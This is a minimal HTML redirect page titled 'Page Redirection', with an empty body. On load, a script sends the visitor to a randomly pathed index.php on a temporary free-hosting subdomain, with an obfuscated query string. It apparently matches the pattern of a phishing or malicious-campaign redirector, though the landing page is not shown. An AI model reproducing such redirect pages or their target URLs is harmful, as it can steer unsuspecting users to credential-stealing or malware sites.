<!DOCTYPE HTML>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="refresh" content="0; url="">

<script>
window.location.href ="http://carotlinca.temp.swtest.ru/251ee15d4d84a1ae7762c3a045b377f0/index.php?gJMcoGOf416652157=rPRTnq0Xm26"
</script>

<title>Page Redirection</title>
</head>
<body>

</body>
</html